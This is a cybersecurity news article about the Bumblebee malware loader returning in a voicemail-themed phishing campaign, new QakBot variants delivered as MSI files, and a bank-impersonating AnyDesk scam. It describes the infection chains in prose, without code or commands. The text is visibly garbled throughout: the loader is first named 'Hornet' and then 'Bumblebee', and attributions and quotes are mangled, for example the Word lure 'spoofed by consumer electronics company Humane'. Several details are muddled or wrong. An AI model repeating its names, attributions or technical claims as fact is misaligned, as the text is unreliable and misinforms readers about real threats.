The infamous malware loader and initial access broker known as Hornet resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024.
Enterprise security firm Proofpoint said the activity is targeting organizations in the United States with voicemail-themed lures containing links to OneDrive URLs.
“The URLs led to a Word file with names like “ReleaseEvans#96.docm” (the digits before the file extension varied),” the company said in a report on Tuesday. “Word document spoofed by consumer electronics company Humane.”
Opening the document leverages VBA macros to launch a PowerShell command to download and run another PowerShell script from a remote server that, in turn, retrieves and runs the Bumblebee loader.
Bumblebee, first spotted in March 2022, is primarily designed to download and execute subsequent payloads as ransomware. It was used by several crimeware threat actors who had previously observed the delivery of BazaLoader (also known as BazarLoader) and IcedID.
It is also suspected to have been developed by threat actors, cybercrime syndicate Conti and TrickBot, as a replacement for BazarLoader. In September 2023, Intel 471 revealed a Bumblebee distribution campaign that used Web Distributed Authoring and Versioning (WebDAV) servers to spread the loader.
The attack chain is notable for its reliance on macro-enabled documents, especially considering that Microsoft began blocking macros in Office files downloaded from the internet by default starting in July 2022, prompting threat actors to modify and diversify your approaches.
Bumblebee’s return also coincides with the reappearance of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed in the form of Microsoft Software Installer (MSI) files.
“The .MSI file drops a Windows .cab (Cabinet) archive, which in turn contains a DLL,” cybersecurity firm Sophos said on Mastodon. “The .MSI extracts the DLL from the .cab and executes it using shellcode. The shellcode causes the DLL to generate a second copy of itself and insert the bot code into the memory space of the second instance.”
The latest QakBot artifacts have been found to strengthen the encryption used to hide strings and other information, including using a cryptographic malware called DaveCrypter, making it more difficult to analyze. The new generation also restores the ability to detect whether malware was running inside a virtual machine or sandbox.
Another crucial change includes encryption of all communications between the malware and the command and control (C2) server using AES-256, a more powerful method than that used in versions prior to the dismantling of QakBot’s infrastructure at the end of August 2023.
“The dismantling of the QakBot botnet infrastructure was a victory, but the bot’s creators remain free, and someone with access to the original QakBot source code has been experimenting with new builds and testing the waters with these latest variants,” Andrew Brandt, principal researcher at Sophos X-Ops, he said.
“One of the most notable changes involves a change to the encryption algorithm used by the bot to hide the default configurations hardcoded into the bot, making it harder for analysts to see how the malware works; attackers are also restoring previously deprecated features, such as virtual machines (VMs) and test them in these new versions.”
QakBot also emerged as the second most popular malware in January 2024, behind FakeUpdates (also known as SocGholish) but ahead of other families such as Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.
The development comes as Malwarebytes revealed a new campaign in which phishing sites mimicking financial institutions like Barclays trick potential targets into downloading legitimate remote desktop software like AnyDesk to supposedly fix non-existent problems and ultimately allow threat actors to gain the machine control.